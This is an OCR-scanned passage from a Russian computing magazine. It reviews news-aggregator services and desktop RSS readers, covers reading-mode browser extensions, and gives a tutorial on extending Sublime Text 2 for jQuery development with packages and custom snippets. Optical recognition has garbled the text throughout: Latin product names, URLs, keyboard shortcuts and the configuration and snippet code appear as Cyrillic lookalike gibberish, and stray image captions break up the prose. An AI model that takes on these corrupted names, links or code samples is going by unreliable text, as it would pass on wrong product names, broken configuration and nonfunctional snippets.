контент, который впоследствии увидят другие серферы, и ставят ему оценки. Чем 
больше хороших оценок за материал, тем больше шансов, что именно эту страницу 
увидит очередной стамблер. 





I гагара п и к 

1 * Наипіей Реган сгі 





А НйгтИНгч ІлфинІ (г кт 




^ 1 . *- *Я 



Интересность контента: 7 Условия использования: Ргее/РаісІ Фильтрация контента: Нет Экспорт материалов: Да 

Свежесть материалов: 8 Наличие тегов: Нет Подключение своих Р55: Нет 




РгІБтаІіс 

аеіргізтаііс.сот 

Сервис подбирает список категорий с интересами на основании Тѵѵіиег-аккаунта 
пользователя, а в дальнейшем генерирует подобие газеты с новостями по опре- 
деленной категории. Отобранные новости очищаются и заново переверстываются 
сервисом. Таким образом, все материалы отображаются в едином стиле, а это 
здорово облегчает чтение (особенно на девайсах с небольшим дисплеем). 

Одна из приятных особенностей сервиса — возможность мгновенной фильтра- 
ции записей. Достаточно кликнуть по любому пункту из предлагаемыхтематиче- 
ских категорий, как сразу же произойдет новая выборка и обновлений ленты. 

Ргізгтіаііс проиндексировал мой тви-акк и, в принципе, приготовил для меня 
блюдо из правильного контента. Я пишу в твиттер больше всего на связанные с 
ІТ темы, поэтому сервис подобрал мне материалы, связанные с этой областью. 



Интересность контента: 6 Условия использования: Ргее Фильтрация контента: Да Экспорт материалов:Да 

Свежесть материалов: 7 Наличие тегов: Нет Подключение своих Р55: Да 



Риізе 

риізе.те 

Любителям всего красивого и изящного однозначно придется по душе новостной 
агрегатор Риізе. Сразу после регистрации аккаунта тебе предлагают выбрать 
одну или несколько новостных категорий. Когда ты определишься с выбором, 
Риізе начнет формировать список свежих топиков. Все найденные посты акку- 
ратненько выстраиваются в виде маленьких плиточек, после клика по которым 
открывается окно с просмотром текста. Все заметки очищаются от лишней 
шелухи и предстают в максимально удобном для чтения виде. 

Свежие материалы сервис находит без проблем, а вот интересность контента 
подкачала. Может, мне не повезло, но практически весь контент затрагивал так 
или иначе лишь новости с популярных ресурсов. Технические статьи попадались 
крайне редко. С языком опять же напряг — весь контент только на английском. 




Интересность контента: 4 Условия использования: Ргее Фильтрация контента: Да Экспорт материалов: Да 

Свежесть материалов: 8 Наличие тегов: Нет Подключение своих Р55: Да 
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БигѴіпдЬігсІ 

зигЛпдЬігсІ.ги 



ЗигЛпдЬігб — это наш ответ ЗіитЫеІІроп. Идея сервисов абсолютно одинако- 
вая — регистрируешься, выбираешь категории интересов. Ну а когда прибьет 
приступ скукоты, начинаешь кликать по кнопке «Серф», дабы получить очеред- 
ную порцию новых и якобы полезных материалов. 

Каждый материал подвергается оценке пользователей, и, собственно говоря, 
количество положительных оценок решает его дальнейшую судьбу. Сервис под- 
держивает возможность комментирования и экспорта понравившихся ссылок. 
Теперь пару слов о качестве работы. ЗигПпдЬігб работает хорошо, и попадаются 
действительно веселые и полезные материалы, но это относится к развлека- 
тельным категориям. Я специально протестировал разделы «Программирова- 
ние», «Компьютеры», и результат меня огорчил. Статьи и новости попадались 
устаревшие. Если для статей это еще можно простить (информация актуальна 
долгое время), но вот читать новости двух-трехмесячной давности как-то не айс. 





Интересность контента: 6 Условия использования: Ргее Фильтрация контента: Да Экспорт материалов: да 

Свежесть материалов: 8 Наличие тегов: Нет Подключение своих РБ5: Да 




ОоодІеСиггепІз 

Шр5://доодІе.сот/ргобисег/сиггепі5 

Корпорация добра не могла остаться в стороне и запустила свой сервис агре- 
гации новостей в «журнальном стиле». Реализация получилась достаточно 
успешной и чем-то похожей на тотже Риіве. В Гугле не изобретать новый интер- 
фейс. Он хорош, но выглядит стандартно для такого рода приложений. Зато они 
попытались разнообразить предложения в плане контента. 

Библиотека категорий достаточно большая, и в ней каждый может найти 
интересные для себя темы. Тот, кто не хочет читать рекомендуемые материалы, 
всегда может подключить свои фиды (есть синхронизация с боодіе Реабег) и 
наслаждаться удобством чтения контента из любимых источников. Сервис за- 
ботится, чтобы пользователь получал максимально свежий контент. По качеству 
отбора материала тоже можно поставить небольшой плюсик. На ІТ-тематику 6С 
подбирал как хорошие новости, так и материалы из крупнейших ІТ-порталов. 



Интересность контента: 9 Условия использования: Ргее Фильтрация контента: Да Экспорт материалов: Да 

Свежесть материалов: 9 Наличие тегов: Нет Подключение своих Р55: Да 



РІірЬоагсІ 

ШрЬоагб.сот 

Ребята из РІірЬоагсІ не страдают отсутствием креатива и подошли максимально 
ответственно к созданию своего приложения. Перед нами все та же идея (тема 
контента — > контент), но реализация сделана нестандартно. РІірЬоагсІ аккурат- 
ненько собирает все новости и верстает из них настоящий журнал. 

Несомненно, радует, что РІірЬоагсІ не ограничивается синхронизацией с 
Соодіе Реабег. К нему также легко можно присоединить свой ТѵѵіНег-аккаунт, и 
он сверстает журнал из твитов. Причем в качестве текстов будут не только тви- 
ты, но и материал, ссылка на который есть в твите. Точно такой же трюк можно 
провернуть со своими аккаунтами во многих других популярных сервисах. 

Нашей страны пока нет в списке поддерживаемых, поэтому новостей и 
статей на русском от сервиса ждать не стоит. По качеству подбора материала на 
английском РІірЬоагб вполне можно приравнять к Соодіе Мебіа. 



НТесІтоІоду Ц 



Ргее аррв аосоипИог 89 регсепі оТ №№І тоЬПе 
йоѵѵпіоайв іл 2012 




Интересность контента: 9 Условия использования: Ргее Фильтрация контента: Да Экспорт материалов: Да 

Свежесть материалов: 9 Наличие тегов: Нет Подключение своих П55: Да 
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2і(е 

гііе.сот 



РН0СкА№1№С 



5сАій№ 



Если РІірЬоагсІ радует своим красивым журнальным видом, то разработчи- 
ков 2\іе стоит поблагодарить за общую концепцию хорошо продуманного 
пользовательского интерфейса. Сразу после запуска приложения предлага- 
ется выбор аккаунтов (Тѵѵіиег, Роскеі, Зоодіе Реабег, РВ), с которыми можно 
синхронизироваться и построить так называемое дерево интересов. Надо 
сказать, что происходит этот процесс достаточно быстро. После построения 
дерева начинается подбор и «верстка» материалов. 

Подбирает материал сервис качественно. Я уже говорил, что пишу и 
читаю в основном на технические темы, и предложенные материалы как 
раз соответствовали тематике. Претензий к свежести контента также не 
было: новости колебались между вчерашним-позавчерашним днем, что, 
в общем-то, неплохо. Жаль только, что 2\іе так и не смог предложить мне 
хоть килобайт текста на родном языке. Все материалы сугубо на языке 
Шекспира, и повлиять на это никак нельзя. 



ТЪе 51оѵл1о>ѵп 



РІчр5і0ітп[кшпд 




АІЬѵгВДуЕй ЁиіЫ№Ь Ар ртг 






1_*агг1 Річ^ гатстійгі^ *н?Ніэи г іу 



| кМІ ипш л Іж ѴЛГГшш 






■ ■ ь і і іі і в|тІч 

НМВР* 1 1 






Интересность контента: 8 Условия использования: Ргее Фильтрация контента: Да Экспорт материалов: Да 

Свежесть материалов: 10 Наличие тегов: Да Подключение своих Р55: Нет 



Критерий 


Приложение 




БІитЫеІІроп 


Ргізтаііс 


Риізе 


ЗигДпдЬіггі 


Соодіе Месііа 


РІірЬоагсІ 


2і1е 


; Интересность контента 


7/10 


6/10 


4/10 


6/10 


9/10 


9/10 


8/10 


і Свежестьматериалов 


8/10 


7/10 


8/10 


6/10 


9/10 


9/10 


10/10 


Наличиетегов 


Нет 


Нет 


Нет 


Нет 


Нет 


Нет 


Да 


Фильтрация контента 


Нет 


Да 


Да 


Да 


Да 


Да 


Да 


Подключение своих Р55 


Нет 


Да 


Да 


Да 


Да 


Да 


Нет 


Экспортматериалов 


Да 


Да 


Да 


Да 


Да 


Да 


Да 


Мобильное приложение 


Да 


Да 


Да 


Да 


Да 


Да 


Да 


Материалы на русском 


Мало 


Нет 


Нет 


Много 


Средне 


Нет 


Нет 



ТНЕКЕ'5 N0 5СН00І. ЫКЕ ТНЕ ОЮ 5СН00І. 



Из-за новых приложений традиционные РББ-сервисы ушли 
в тень, но полностью забыты не были. Продвинутой аль- 
тернативой является Меѵѵ5Ыиг (пеѵѵзЫі ), его можно 
посоветовать людям, которые очень серьезно относятся 
к мониторингу интернета (но много ли таких?). Сильные сто- 
роны — очень оперативный рефреш лент, самообучающаяся 
система фильтрации, возможность просмотра оригинальной 
страницы статьи прямо внутри Меѵѵ5Ыиг. 

Также можно поднять и собственный «ридер» на серве- 
ре-для этого есть свободный проект ТіпуТіпуРББ ( Н-г55.огд ). 
но посоветовать его можно только тем, кому нужен какой-то 
очень специфический механизм фильтрации контента. 

Более подробно говорить об альтернативах Зоодіе 
Реасіег не имеет смысла — остаются лишь очень нишевые 
решения. 
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РС20ЫЕ 



К55-ЧИТАЛКИ ДЛЯ ДЕСКТОПА 



РеесІОетоп 

іееббетоп.сот 



Под ѴѴіпбоѵѵз написано очень много всевозможных Р55-агрегаторов, но одним 
из наиболее продвинутых уже давно является РеесШетоп. Программа доступна 
в нескольких версиях (Біапбагі и Рго). Главное отличие платной версии от бес- 
платной — наличие рекламы. Поддержка синхронизации с боодіе Реабег при- 
сутствует. Интерфейс программы слишком устарел (все напоминает ѴѴіпбоѵѵз ХР]. 
Из интересных возможностей стоиттакже выделить возможность присвоения 
тегов для постов. Очень порадовало наличие встроенного браузера (на движке 
ІЕ) с табами, а также возможность чтения загруженных материалов оІЧІіпе. Без 
огорчений также не обошлось. Никаких намеков на геабаЬіІіІу, суперкрасивого 
форматирования текстов здесь нет. Как, впрочем, нет и связи с популярными 
сервисами. Складывается ощущение, что программа застряла в прошлом. 

Резюме: Неплохая читалка в функциональном плане, но намертво застряв- 
шая в прошлом из-за интерфейса. Напоминает старый М5 ОиІІоок. 




Условия распространения: 5Ііагеѵѵаге/Ргее Основная платформа: ѴѴіпсІоѵѵб 



Версия для других платформ: Нет 




ЫеМеѵѵзѴѴіге 

пеіпеѵѵзѵѵігеарр.сот 

ІМеІІМеѵѵзѴѴіге больше похож на типичные офисные приложения вроде М5 ОиІІоок. 
Из функционала у ІМеШеѵѵзѴѴіге на борту типичный набор для программ такого 
типа: синхронизация с боодіе Реабег, самостоятельная работа, сохранение по- 
стов в Іпзіарарег и так далее. Основная изюминка ЫеіЫеѵѵзѴѴіге — поддержка 
языка сценариев АррІебсгірС Понадобится такая фишка только самым продви- 
нутым пользователям (коим ты и являешься], но она открывает поистине без- 
граничные возможности. Огорчает, что, несмотря на крутую функциональность, у 
ІМеІІМеѵѵзѴѴіге отсутствует поддержка чтения в упрощенной форме. 

Резюме: Скромный интерфейс и поддержка Арріебсгірі однозначно понра- 
вится матерым гикам. 



Условия распространения: $Ііагеѵѵаге/Ргее Основная платформа: Мае 05 



Версия для других платформ: І05 



ЫТегеа 

ІіГегеа.зоигсеіогде.пеі 

Ы^егеа — по прежнему самый зрелый Р55-агрегатор для Ыпих. Поддержи- 
вается интеграция с боодіе Реабег и Ті пуТіпу Р5Б, но есть и возможность 
работать в автономном режиме, без привязки к какому-либо веб-сервису. При 
желании оформление статей можно изменить с помощью С55. К сожалению, 
клиент не поддерживает привычных функций вроде публикации статей в 
социальных сетях и сервисах закладок — для этого стоит обратить внимание 
на совсем новый и менее отточенный клиент ЫдЫРеаб ( Шрз://ІаипсЬраб.пеі/ 
ІіаЫтеаб ). 

Резюме: Ставший живой классикой Р55-агрегатор для Ыпих, альтернатив 
которому, по сути, и нет. 







Условия распространения: ОрепЗоигсе Основная платформа: І_іпих/В50 



Версия для других платформ: Нет 
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Полезные расширения для браузеров 

Современные веб-страницы — это не только полезный и ценный контент, но еще туева куча режущей глаз рекламы. Бывает, попадаешь на 
какой-то блог и вроде все хорошо: темы заметок шикарные, стиль изложения автора оставляет приятные впечатления, но читать текст невоз- 
можно. Автор либо перемудрил с отступами, что заставляет глаза быть в постоянном напряжении, либо решил заработать и раскрасил свои по- 
сты большими рекламными картинками/ссылками и так далее. Чтобы как-то сгладить проблему, мудрые разработчики придумали специальные 
расширения для браузеров. Они ловко вычищают весь мусор и предоставляют контент в наиболее выгодном свете. 



Заіагі 

Маководам (теперь Баіюгі будет доступен только для Мае ОБ) не- 
слыханно повезло — все необходимое они получают сразу после 
установки браузера. При заходе на любую страницу, содержащую 
статью/заметку (одним словом, объемный текст), в строке ввода 
адреса появляется кнопка «Реаб». Одно нажатие — и всплывает 
окошко, в котором мы видим хорошо отформатированный текст 
страницы на белом фоне. Расширение любезно вырезает лишние 
картинки (например, рекламу) и оставляет только изображения, 
непосредственно относящиеся к основному тексту. 



РігеѴох 

Расширение СІеагІу доступно как для Рігеіюх, так и для Соодіе 
СИ готе. Главная функция — очистка страницы от лишнего 
мусора. С этой задачей СІеагІу справляется хорошо, и на проте- 
стированных мной страницах каких-либо проблем замечено не 
было. Среди других полезных функций — возможность сохране- 
ния очищенной заметки прямо в Еѵегпоіе. А вот с возможностью 
публикации ссылок в соцсети проблема. Такой возможности 
попросту нет. 







Орега 

Используй СІеапРадез. Несмотря на небольшую популярность, 
браузер Орега не обделен вниманием. Функционал расширения 
значительно беднее (не жди от него красивостей вроде всплываю- 
щих окон), чем для СЬготе и Рігеіюх, но с задачей очистки страни- 
цы от мусора справляется хорошо. На выходе получается страница, 
оптимизированная для чтения и печати. 



боодіе СНготе 

Подойдет ІРеабег. Великолепное расширение, скопированное с 
Реабег для Ба^агі. Расширение вырезает со страницы все лишнее и 
оставляет только полезный для чтения контент. Правда, стоит за- 
метить, что в отличие от оригинала (соответствующая возможность 
в Баіюгі) ІРеабег работает во многих случаях лучше. Со страницами, 
которые не распознал Реабег, прекрасно справился іРеабег. Кроме 
того, іРеабег позволяет расшарить понравившийся материал в 
Тѵѵіиег, РасеЬоок и РІіскг. 
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Илья Муравьев 




ПОЗНАЕМ ДАО 

ЗиЫіппе Техі 2 



ПРЕВРАЩАЕМ ПОПУЛЯРНЫЙ РЕДАКТОР 
В ЛШЕЯѴ-КОМБАЙН С ПОМОЩЬЮ МОДУЛЕЙ 



БиЫіте Техі любят многие. Даже флудеры с ха- 
бра положительно отзываются об этом програм- 
мерском редакторе! Однако поступают на него 
и жалобы — например, на то, что в нем нет при- 
вычного окна настроек, удобной установки рас- 
ширений, и это напрочь отбивает желание с ним 
знакомиться. На самом деле это не так: редактор 
можно заточить под любую область разработки. 

Я покажу, как просто и удобно устроен БиЫіте 
Техі, на примере іОиегу-кодинга. 



ЗНАКОМИМСЯ С 51ІВИМЕ ТЕХТ 2 

5иЫіте Тех* 2 не нуждается в особом представлении. Сегодня он 
считается едва ли не самым продвинутым мультиплатформенным 
редактором. Область его применения — от ріаіп *ех* до РиЬу, Ру*Ьоп 
и десятков других языков. В № 154 за 2011 год твоего любимого жур- 
нала уже был подробный обзор с описанием всех ключевых фич, так 
что эту тему я умышленно пропускаю. Сейчас цель несколько иная — 
приспособить его под конкретные задачи. 

Для дальнейшей препарации понадобится последняя версия 
редактора, скачиваем ее с официального сайта программы 
ѵѵѵѵѵѵ.зиЫітеіехі.сот . За 59 долларов ты можешь приобрести лицен- 
зию для 5иЫіте Тех* (5Т), но никаких функциональных ограничений 
в бесплатной версии нет. Единственный негатив — напомина- 
ние, изредка маячащее на горизонте окна программы, и пометка 
ІІЫРЕСІЗТЕРЕО в заголовке. 
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Познаем Дао ВиЫіте Тех* 2 



Кроме того, доступна рог*аЫе-версия. Она будет полезна, если 
ты планируешь перенести редактор на флешку или на другую рабо- 
чую машину. В принципе, это даже более удобный вариант стацио- 
нарной установки, так как все файлы будут собраны в одной папке, 
а не разбросаны по системе. Все описываемые далее настройки 
будут равно применимы ко всем свежим сборкам под ѵѵіп, за исклю- 
чением минимальных различий в файловых путях. 

ТЯЖЕЛО В УЧЕНИИ, ЛЕГКО В БОЮ 

Перед тем как начать наращивать функционал 5иЫіте Тех*, обратим 
внимание на одну особенность русской души — желание освоить 
методом научного тыка любое свойство, явление или вещь. Так вот: 
к сожалению, с 5Т этот трюк не проходит. 

Я не буду давать советы по работе с редактором, их бесчислен- 
ное множество на просторах Сети. Скажулишь одно — учи горячие 
клавиши! И это не шутка. Все дело в том, что на хоткеях основаны 
все коронные операции 5иЫіте Тех*, которые будут меньше отвле- 
кать от кода и помогут сосредоточиться на работе. 

Едва ли не самая известная особенность 5иЫіте Тех* — муль- 
тивыделение. Если нужно одновременно выделить одинаковые 
значения, используем <АІ* + Р3>. Упаси боже делать это через 
поиск и замену (<С*гІ + Н>, кстати)! Одинаковые слова, теги, 
переменные очень просто создавать одновременно. Для этого 
держим <С*гІ> и устанавливаем курсор на тех участках, где нужно 
ввести данные. 

При работе с проектами возникает необходимость быстро 
перемещаться между файлами, создавать новые структуры. 

В принципе, это можно сделать через сайдбар (<С*гІ + К>, <С*гІ 
+ В>), где папки и файлы создаются через контекстное меню. 
Однако есть небольшой хинт, позволяющий сократить время, — 
установка модуля АсІѵапсесІ ЫеѵѵРіІе. Данное расширение создаст 
за тебя папку, остается лишь указать путь расположения файла, 
нажав <С*гІ + АН + І\І> (вместо того чтобы создавать новую дирек- 
торию, а в ней файл). Как устанавливать расширения, я расскажу 
в следующей главке. 

Одна из наиболее продвинутых функций 5иЫіте, под которую 
выделен целый раздел меню РіпсІ, — поиск по файлам. Если в твоем 
проекте счет идет на десятки файлов, удобно их открывать через 
поиск, который работает шустрее, чем в любой ЮЕ-среде. Причем 
5Т поддерживает неточный ввод. <С*гІ + Р/Р/6> — переход к файлу/ 
символу/строке. 

Во многих приложениях, которые уважают пользователя, пред- 
усмотрен полноэкранный режим. В БиЫіте Тех* он активируется 
по <Р11>. Но есть и другой мегаудобный режим «не отвлекаться» — 
<5Ы** + Р11>. В нем переключаешься между вкладками через <АІ* + 
цифра>. Можешь побаловаться со слоями (Іауои*з) и выбрать наи- 
более удобный режим — <5Ы** + АН + цифра>. 

Если трудно сразу все это запомнить, можно воспользоваться ин- 
терактивным тренажером для клавиатурных сочетаний: із.дсІ/сМОРІ Н . 
Шпаргалка на русском языке: із.дсІ/ВЬМСѵЬ . 



БІІВЫМЕ РАСКА6Е С0І\ІТР0І_ — 

НАРАЩИВАЕМ ФУНКЦИОНАЛ 

Все расширения в БиЫіте Тех* именуются Раскадез. Сюда 
входят и функциональные модули, и темы оформления. Можно 
по старинке устанавливать дополнения вручную, через меню 
«Рге*егепсез — > Вгоѵѵзе раскадез» и копируя пакеты в "0оситеп*з 
а псі 5е**іпдз\папка пользователя\АррІіса*іоп 0а*а\5иЫіте Тех* 2\ 
Раскадез" ("0а*а\Раскадез м в рог*аЫе-версии). Но за нас это кра- 
сиво сделает пакетный менеджер БиЫіте Раскаде Соп*гоІ (5РС). 
Суть в том, что он скачивает расширения с репозитория, а также 
6і*Н и Ь, Ві*Виске* и с ^ОЫ-репозиториев, которые ты опреде- 
лишь сам. Мы обращаемся к нему через консоль редактора, лишь 
указывая название пакета из списка. Зайди на із.асІ/бзоѴѴАБ. и ты 
увидишь все доступные пакеты. 

Итак, для установки менеджера пакетов в БиЫіте Тех* за- 
пускаем консоль (<С*гІ + '>) и вбиваем код, указанный в разделе 
«Іпз*аІІа*іоп» на ѵѵЬопсІ.пе* [ Ьі*. I ѵ/ѵѵа Кд Рд ) (приводить не буду, 
удобней сделать копипаст). Перезапускаем БиЫіте. Отныне 
расширения можно устанавливать из консоли по нажатию <С*гІ + 
БЫ** + Р> (или «Рге*егепсез — > Раскаде Соп*гоІ»). Для того чтобы 
установить новый пакет, вводим в консоли « I п з * а 1 1 Раскаде», 
в статусной строке наблюдаем за процессом. Выбираем в вы- 
падающем списке пакет, кликаем по нему или нажимаем <Еп*ег>. 
Перезагружаемся (опционально). 

Во всех рассмотренных ниже случаях для установки расшире- 
ний этого способа будет достаточно. Однако если пакет не включен 
в дефолтный канал репозитория, придется подключать 6і*НиЬ/ 
Ві*Виске*Аі50І\І, о чем можно прочесть в документации к 5РС. 

^ЕРУ РАС К АО Е — ДОБАВЛЯЕМ 
СИНТАКСИС И СНИППЕТЫ 

Первое, что нам нужно для базового боекомплекта, — это под- 
светка синтаксиса. В БиЫіте Тех* соответствующий переключа- 
тель расположен в правом нижнем углу, однако )0иегу в списке 
не числится. Доступны ЗаѵаБсгір* и 350Ы, но все особенности 
фреймворка )0иегу данные надстройки не учитывают. )0иегу 
Раскаде Пз.дб/аппЗБкМ ) компенсирует это небольшое упущение. 
Установив пакет, также можем сменить цветовую схему через 
меню «Рге*егепсез — > Соіог БсЬепгіе». В )0иегу Раскаде также 
входят сниппеты (читай главу ниже). Плюс, если ты работаешь 
с іСІиегу МоЬіІе, советую установить )0иегу МоЬіІе 5пірре*з: 
і з . а сі /о 8 М 4 у] . 

ОЕТЕСТБУІМТАХ — 

АВТООПРЕДЕЛЕНИЕ СИНТАКСИСА 

БиЫіте Тех* не читаеттвои мысли, поэтому изначально формат 
документа не определен. Соответственно, синтаксис не работает, 
и его нужно устанавливать вручную. Расширение 0е*ес*5уп*ах ( із.дсі/ 
еІтНсХ ) позволяет задавать специальные правила для автоопреде- 
ления любого синтаксиса. 



Тик Рінцс.сі РгёІегмск Неір 
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Если мы хотим, чтобы все наши файлы открывались в )0иегу, 
в конфиг Раскадез/ІІзег/ОеІесіБупІах.зиЫіте-зеШпдз нужно до- 
бавить правило: 

Конфиг РеѣесѣБупІіах.зиЬІіте-зе-Ь-Ьіп^з 

І_ 

"пате" : "дОиегуЗаѵаБсгірІ:" . 

"гиіез" : [ 

{ "б1е_пате": " .*\\.д5$" } 



Здесь )СІиегубаѵа5сгірІ — это название синтаксиса, который 
мы установили вместе с ] 0 и е гу, значение пате взяли из Раскадез\ 
)0иегу\5упІахез\)С1иегубаѵа5сгіритІ_апдиаде. Опционально пара- 
метром ПгзЫіпе можно задавать текст первой строки для формата. 
Правила (гиіез) пишутся на РедЕхр. Для изучения проще всего от- 
крыть конфиг Раскадез/ОеІесіБупІах/ОеІесіБупІах.зиЫіте-зеШпдз 
или перезаписать файл в директорию ІІзег. Никогда не редактируйте 
дефолтный конфиг, не зря есть юзерские настройки. 

УЛУЧШАЕМ ЧИТАБЕЛЬНОСТЬ С ^РОКМАТ 

Во время хардкорного кодинга сложно соблюдать порядок при 
оформлении и нередко возникает бардак. Структуру кода нужно 
приводить в читабельный вид, но нерационально делать это вруч- 
ную. Так называемых бьютиферов для 65 немало, ЭзРогтаІ ( із.аб/ 
РЬЬбс ) — один из них. В действии расширение проявляет себя так: 
выделяешь участок Э5-кода, который нужно привести в порядок, 
нажимаешь комбинацию <СігІ + АН + Р>. 

Можно поковыряться в конфиге ^РогтаШзРогтаСзиЫіте- 
зеШпдз и, если что-то не устраивает, поменять настройки под 
себя. Вот некоторые полезные опции: 

• П тах_рге5егуе_пеуу1те5": 4 — максимальное количество раз- 
рывов строк в фрагменте; 

• м рге5егѵе_пеѵѵІіпе5": Ігие — сохранение существующих разры- 
вов строк; 

• "ізііп^ііарру": {аізе — включение строгого режима )5ІіпІ-зІгісІег; 

• п Ьгасе_5ІуІе": "соііарзе" — стиль скобок [соііарзеіехрапбіепб- 
ехрапсііехрапсі-зігісі:] (по умолчанию «соііарзе»); 

• ,, кеер_аггау_іпсIеп^а^іоп ,, : {аізе — сохранять отступ в массивах. 

^МШІРІЕК: 

МИНИМИЗИРУЕМ 35 

Порядок в коде мы наводим для себя, для выкладывания на серве- 
ре стоитзадача минимизировать количество строк. ЭзМіпНіег (із. 
дб/8хЬз7д ) компрессирует код, основываясь на правилах Ооодіе 
СІозиге Сотрііег и ІІдІНуЭЗ: убирает комментарии, пробелы, кавыч- 
ки, прочее. Выделив код и нажав <СігІ + АН + М>, ты приятно уди- 
вишься :). Если нужно сохранить исходный и конечный результаты 
раздельно, скопируй код через <СігІ + АН + 5ЫК + М>, создай новый 
файл и вставь в него компрессированный буфер обмена. 

ПРОВЕРКА ПРАВОПИСАНИЯ 
СБивимЕШТЕР 

Для поиска ошибок в коде оптимально задействовать браузерную 
консоль, но не очень рационально с ее помощью ловить опечатки. 

В данном случае окажет полезную услугу расширение 5иЫітеІ_іпІег 
( із.аб/ІоХЗІд ), которое в режиме реального времени следит за 
корректным написанием кода на основе правил ЭаѵаЗсгірІ (см. із.асі/ 
ЬРХпиѴ как пример). 5иЫітеІ_іпІег предлагает валидаторы )зЫпІ, 
)зііпі и д)зІіпС 

Кроме того что пакет нужно устанавливать через 5РС, 
для ѴѴіпбоѵѵз придется скачать интерпретатор с сайта п о сі е ) 5 . 
огд. Вполне возможно, что понадобится подправить конфиг 
«Ргеіюгепсез — > Раскаде БеШпдз — > 5иЫітеІ_іпІег — > БеШпдз - 
Ое^аиІІ» и указать в параметре зиЫітеІіпІег_ехесиІаЫе_тар 
адрес экзешника побе.ехе, если путь не определится самосто- 
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Вызов сниппета 



I И ІЕ (іурееЕ ЭДиегу ' упбеЕіпей ' ) Ц 

2 // 15 НОТ іопбсб, бо 5 

[)з Л 



Вставка сниппета 



ятельно. Также можете менять цвета определения ошибок по 
своему усмотрению. 

По умолчанию работает фоновый режим (ВаскдгоипсІ тобе), опти- 
мальный для реалтайм-отслеживания ошибок. Также возможны: 

• І_оасІ-5аѵе тобе (сохранение/загрузка), 

• 5аѵе-опІу тобе (только при сохранении), 

• Оп бетапб тобе (поиск ошибок по требованию, посредством 
клавиш<СігІ + АН + І_>). 

5иЫітеІ_іпІегуниверсален и поддерживает не только баѵаБсгірІ, 
но и РуіЬоп, РегІ, РиЬу, С55 и прочие языки. 

НЕ ЗАПУТАТЬСЯ В ДВУХ СКОБКАХ 
СВРАСКЕТНІ6Ш6НТЕР 

Новичкам, в частности, очень сложно разобраться, где в )0иегу Цз^ 
дб/ѵ1І"ііо2 ) скобка открывает код, а где закрывает. В довесок к пре- 
дыдущему расширению этот простенький модуль подсвечивает 
парные скобки. 

2ЕЫ С00Ш6 — ПОЗНАЕМ ДЗЕН ЧЕРЕЗ НТМЬ 

При работе с НТМІ_ )Оиегу-программисту часто приходится за- 
ниматься копипастом, клонируя те или иные теги. 2еп Собіпд ( із.дб/ 

И N РЬг5 ) максимально упрощает этот рутинный процесс, позволяя 
одной строкой описать будущую структуру документа. В действии 
можно увидеть тут: ѵітео.сот/7405114 . 

Для создания базовых тегов и йОСТУРЕ в НТМЬдокументе на- 
жимаем <СігІ + АН + 5ЫН + Н>. Далее есть два метода ввода: 

1) хорошенько подумать, что нам нужно, и выразить это одной геп- 
строкой, нажав затем <СігІ + 5расе> или <ТаЬ> для превращения 
запроса в НТМІ_; 

2) одновременно вводить геп-запрос в консоли (<СігІ +АН + ЕпІег>) 

и смотреть на результат. Этот режим называется 2 еп_аз_уои_ 1 уре. 

Остальные возможности описаныздесь: із.аб/ПІЛд]2 . В довесок 
к2еп Собіпд можноустановитьрасширениеТад, которое форматирует 
НТМІ_ в более читабельный вид, — з.дб/Х9І05Р . 

ПИШЕМ СВОЙ СНИППЕТ 

В БиЫіте Тех* сниппеты — это фрагменты кода, которые часто при- 
меняются в определенном языке и могут быть вызваны через меню 
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Подсветка синтаксиса іОиегу + тема ТѵѵіІідН* 



или сокращенный ввод. Не стоит путать определение «сниппет» 
с классическим, википедийным определением — в программирова- 
нии это более широкое понятие (см. із.дсІ/ІдРѵѵѵх ). 

Сниппет срабатывает при вводе сокращенного выражения 
и нажатия <ТаЬ>. Также всегда можно воспользоваться подсказкой 
через меню «Тооіз — > 5пірре*з...», где ты увидишь список сниппетов 
и сокращений, по которым срабатывает сниппет. 

Анатомия сниппета достаточно проста, чтобы написать его само- 
стоятельно. У нас есть шпаргалка — глава неофициальной докумен- 
тации ( І5.дсІ/55рЫ7 ) и огромное количество примеров, установленных 
вместе с пакетом ЛЗиегу Раскаде, в папке Раскадез^'Оиегу. 

Первый доступный способ создать сниппет — через меню 
«Тооіз — > Ыеѵѵ Бпірре*...». Перед нами отобразится шаблон, который 
мы модифицируем. 

Шаблон сниппета 

<зпірре1:> 

<соп1=еп1=> 

< ! [СРАТА[Не11о. ${1:1=ІіІ5> із а ${2:зпірре1=>. ]]> 
</сопііеп1:> 

<!-- <1:аЬТгі§§ег>Ье11о</1:аЬТгі§§ег> --> 

<!-- <зсоре>5оигсе. ру1:Ііоп</5соре> --> 

</зпірре1:> 

Расшифровка: 

• зпірре* — обертка сниппета, его начало и конец; 

• соп*еп* — содержимое, которое будетдобавляться в документ при 
срабатывании сн и ппета: <![СОАТА[вставляем содержимое сюда]]>; 

• *аЬТгіддег — при вводетриггера (ЬеІІо) и нажатии<ТаЬ>сниппет 
вставится вдокумент; 

• зсоре — селектор диапазона для активации сниппета, проще 
говоря — в файлах какого формата будет использоваться сниппет. 
Например,указываем<5соре>5оигсе.Ь*тІ</зсоре>для его акти- 
вации сугубо в НТМІ_-сорцах; 

• безсгір*іоп — человеческое описание сниппета. 

Теперь рассмотрим простенький пример. 

Пример простейшего сниппета 

<зпірре1:> 

<соп1:еп1:> 



< ! [СРАТ А[іТ (ТуреоТ д(2иегу == ' ипсіебпесі ' ) { \ 

${0: $5ЕІ_ЕСТІОІ\І } // Н а с лучай , есл и дС^иегу на 

странице нет, ничего не 

загружаем. 

}]]> 

</соп1:еп1:> 

<1:аЬТгі§§ег>ипсІебпесІ</1:аЬТгі§§ег> 

</зпірре1:> 

Комментарий в сниппете мы затрем в любом случае, поэтому 
с помощью $5ЕІ_ЕСТІ0І\І выделяем его. $5ЕІ_ЕСТІ0Ы — пере- 
менная окружения, расшифровку переменных читай ниже. $1 .. 
$п — поля, между которыми можно переключаться с помощью 
<ТаЬ>. Поля могут быть зеркальными, то есть несколько значе- 
ний $1 будут изменяться одновременно. Плейсхолдер — поле со 
значением по умолчанию. Будьте внимательны: ноль указывает 
на то, что данный фрагмент будет конечным при выделении 
ТаЬ'ом, а не первым (как хотелось бы думать). Так, в следующем 
примере: 

Порядок плейсхолдеров в сниппете 

<з1:гіп§> 

. НісІе(${1/ ( л [0-9]+$) | .+/(?!: : ' )/} 
${1:з1оы/4Ѳ0/-Раз1:}${1/Х л [ 0 - 9 ] + $) I . +/( ?1 : : ' )/}, Типс 1 :іоп() { 
${Ѳ : // То. что нужно в ыполнить после анимаци и }; 

}); 

</з1=гіп^> 

